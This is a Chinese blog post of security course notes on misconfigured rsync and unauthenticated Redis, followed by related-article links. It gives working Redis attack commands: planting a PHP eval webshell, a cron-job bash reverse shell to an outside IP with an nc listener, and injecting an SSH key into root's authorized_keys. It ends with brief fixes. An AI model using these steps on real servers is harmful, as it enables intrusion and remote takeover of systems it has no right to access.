安全基础rsync/redis配置不当打卡第八天

最新推荐文章于 2024-04-07 17:36:47 发布
最新推荐文章于 2024-04-07 17:36:47 发布
阅读量186 收藏
点赞数
分类专栏: 安全学习 文章标签: rsync redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013133143/article/details/97145351
版权

本文为苏尚武老师运维安全课程课程笔记

  • Rsync
    rsync -avzP -e ’ssh -p 22 /tmp/ test@ip:/web/‘通过ssh传输
    rsync+crontab
    rsync+sersync
    默认端口873
    配置低级错误:使用root,关闭只读,取消认证
    通过扫描873端口,进行rsync上传导网站根目录
  • python编写rsync扫描脚本
    扫描开放873端口
    获取rsync目录
    密码尝试
  • redis配置不当
    redis未授权访问漏洞,造成linux挖矿
  • 三种攻击手法
  • webshell:
    进入控制台
    获取网站路径
    config set dir /var/www/html
    config set dbfilename shell.php
    set x “<?php @eval($_POST[a]);?>”
    save
    然后可以通过php连接访问网站中的程序
  • 写入crontab任务:
    set x “\n* * * * * bash -i >& /dev/tcp/192.167.4.107/6666 0>&1\n”
    config set dir /var/spool/cron/
    config set dbfilename root
    Save
    Attack:nc -lvnp 6666
  • 写入ssh公钥
    (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > foo.txt
    cat foo.txt |redis-cli -h 192.168.4.106 -x set crackit
    连接上去redis-cli -h 192.168.4.106设置
    config set dir /root/.ssh/
    config set dbfilename “authorized_keys”
    save
    可以直接通过ssh -i id_rsa.pub root@192.168.4.106
  • 修复redis
    设置密码
    不要把redis暴露公网
    普通权限启动
    降低普通用户.ssh权限
2ox
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
分分钟就会Redisrsync远程同步
糖球溜溜的博客
11-13 823
文章目录一、rsync介绍rsync简介rsync服务的模式rsync特点rsync 命令及其参数二、搭建rsync服务案例环境案例部署 一、rsync介绍 rsync简介 rsync(Remote Sync,远程同步)是一个开源的快速备份工具,可以在不同主机之间镜像同步整个目录树,支持增量备份,并保持链接和权限,且采用优化的同步算法,传输前执行压缩,因此非常适用于异地备份、镜像服务器等应用。 rsync 的官方站点的网址是 http://rsync.samba.org/,目前最新版本是 3.1.3,由 W
3.2.1 Rsync---3.3.1 Redis (上)---3.3.2 Redis (下)
weixin_33690367的博客
05-15 142
2019独角兽企业重金招聘Python工程师标准>>> ...
常见运维漏洞-Rsync-Redis
weixin_34179762的博客
05-14 177
转载于:https://blog.51cto.com/10945453/2394651
rsync配置认证方式
congqingshi6182的博客
11-23 359
rsync配置认证方式/etc/rsyncd.conf uid = wst40gid = wst40max connections = 50pid file = /var/run/rsyncd.pidlock file = /v...
rsync/redis 漏洞
bozhubing0375的博客
07-24 419
Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。rsync 默认同步时是不加密的,可使用 ssh隧道 的方式来进行加密同步rsync -avzP -e 'ssh -p 22 /tmp/ test@ip:/web/' rsync + crontab rsync + sersync # 实时...
OS + Linux File nfs / samba / rsync / inotify / smb / webdav
03-21
标题 "OS + Linux File nfs / samba / rsync / inotify / smb / webdav" 涉及的是Linux系统中的文件共享与同步技术。这些技术在多台计算机之间进行数据交互、协作工作或者备份中起到关键作用。下面将详细阐述每个...
写一个用rsync免密传送/srun3/db_backup和/srun3/redis_backup目录下所有文件及子目录到192.168.20.239服务器/remote_back的脚本
06-09
好的,以下是一个用rsync免密传送/srun3/db_backup和/srun3/redis_backup目录下所有文件及子目录到192.168.20.239服务器/remote_back的脚本示例: ``` #!/bin/bash # 目标服务器IP地址和目录 remote_server="192....
rsync配置
11-22
rsync 配置 rsync 配置是一种远程同步工具的配置方法,主要用于实现服务器之间的文件同步。下面是 rsync 配置的详细知识...但是,通过正确的配置rsync 服务可以实现服务器之间的文件同步,提高数据安全性和可靠性。
CentOS6.5平台上rsync服务器安装配置方法简述
09-15
在本文中,我们将深入探讨如何在CentOS 6.5平台上安装和配置rsync服务器。rsync是一款强大的数据同步工具,常用于备份和镜像任务,因为它能够高效地处理增量同步,只传输文件的差异部分。 **rsync安装** 首先,...
redis主从复制原理 + 哨兵原理 +rsync
STARDEIT的博客
12-29 923
目录一、redis主从复制原理二、哨兵监控集群节点过程三、rsync远程同步 一、redis主从复制原理 1、主节点发送SYNC同步请求 2、主节点收到请求后 ,派生子进程fork,进行全量复制(RDB快照)(注意这时还有数据在不断写入主节点) 3、主节点在进行完全量复制后,再将缓存中的数据通过AOF持久化的方式传递给从(就是在进行全量复制时,主节点另一部分还不断写入的数据),AOF持久化类似于将日志传递给从。 4、全量RDB和增量AOF执行完成后,同步写入操作命令,持续性的由主同步给从 二、哨兵监控集群节
Redis群集模式和rsync远程同步
fantuan_sss的博客
04-07 1053
Redis集群引入了哈希槽的概念,Redis集群有16384个哈希槽(编号0-16383),集群的每个节点负责一部分哈希槽,每个Key通过CRC16校验后对16384取余来决定放置哪个哈希槽,通过这个值,去找到对应的插槽所对应的节点,然后直接自动跳转到这个对应的节点上进行存取操作。rsync(Remote Sync,远程同步) 是一个开源的快速备份工具,可以在不同主机之间镜像同步整个目录树,支持增量备份,并保持链接和权限,且采用优化的同步算法,传输前执行压缩,因此非常适用于异地备份、镜像服务器等应用。
Rsync漏洞 && Redis漏洞
CN_SHzhaoyujie的博客
12-04 1510
Rsync漏洞 && Redis漏洞 Rsync配置不当 Rsync(remote synchronize)是一款实现远程同步功能的软件。它在同步文件时可以保持原来文件的权限,时间,软硬链接等附加信息。rsync默认同步是不加密,可使用ssh隧道方式进行加密同步。端口默认873,和其他软件搭配使用 rsync + crontab rsync + sersync 使用ssh隧道方式进...
redis的一些坑
凌风探梅的专栏
08-06 4209
from:http://my.oschina.net/u/875730/blog/378086 0 redis跨机房使用问题   一般地,redis的每个实例都是一个master加上一个slave,这一主一备一般要放在同一个机房idc,否则会出现各种莫名其妙的问题。为了防止一个idc出问题,可以用scp或者rsync命令把redis数据定时(譬如每隔10分钟或者半小时)地备份到另一个机房。
Redis的同步机制是怎么样的?
xiancaione的专栏
05-22 1744
1.同步机制 redis可以通过命令slaveof 120.0.0.2(主master)成为一个Redis的从服务 旧版本分为(2.8之前): 1 同步(sync) 过程如下 2 命令传播 (command propagate) 当主DB有修改时,主服务器会以命令传播的形式到从服务器,达到主从同步 缺点: 想象一下这种场景,如果从服务是未通不过的,走上面的整个流程是没有什么问...
rsync项目实战
白衣不染尘的博客
06-07 2568
某公司里有一台web服务器,里面的数据很重要,但是如果硬盘坏了,数据会丢失,现在领导要求你把数据在其他机器上做一个周期性定时备份。要求如下:每天晚上00点整在web服务器A上打包备份网站程序目录并通过rsync命令推送到服务器B上备份保留(备份思路可以是现在本地按日期打包,然后再利用rsnc推到备份服务器上)具体要求如下:1)web服务器A和备份服务器B的备份目录必须都为/backup2)web服...
rsync
haitianisgood的博客
07-01 1894
rsync简介:rsync : a fast, versatile, remote (and local) file-copying toolrsync centos7中安装 Push: rsync [OPTION...] SRC... [USER@]HOST:DEST xinetd安装 主配置文件/etc/rsyncd 密文rsyncd.secrets 全局参数说明、模块参数说明
Redis 未授权访问缺陷
我心如水
06-19 1万+
昨天接到一个开发朋友的求助说是有一个异常的进程占用了将近百分之800(8核)cpu使用率,于是登录服务器查看,确实有一个异常进程,通过ps查到了该进程调用的脚本,继而继续追踪后门定时任务,确实都存在,通过后门定时任务找到了攻击的最终源头,起因便是redis未授权漏洞造成,下面公布一下该攻击脚本: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/
Redis主从同步原理-SYNC
热门推荐
ahsxsk的学习之路
02-23 4万+
和MySQL主从复制的原因一样,Redis虽然读取写入的速度都特别快,但是也会产生读压力特别大的情况。为了分担读压力,Redis支持主从复制,Redis的主从结构可以采用一主多从或者级联结构,下图为级联结构。 Redis主从复制可以根据是否是全量分为全量同步和增量同步。1 全量同步Redis全量复制一般发生在Slave初始化阶段,这时Slave需要将Master上的所有数据都复制一份。具体步骤
安全学习安全加固openResty卡第十二天
蟋蟀15型
07-31 754
本文为苏尚武老师运维安全课程课程笔记 安装OpenResty yum install -y readline-devel pcre-devel openssl-devel git wget vim openssl-devel gcc curl tar -zxvf ngx_openresty-1.9.3.2.tar.gz ...
chown -R rsync.rsync /date/
最新发布
05-16
chown -R rsync.rsync /date/ 是一个Linux命令,它的作用是将 /date/ 目录下的所有文件和子目录的所有者和所属组都改为 rsync.rsync。其中,-R 表示递归地处理目录及其内容。rsync.rsync 是一个用户和组的名称,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值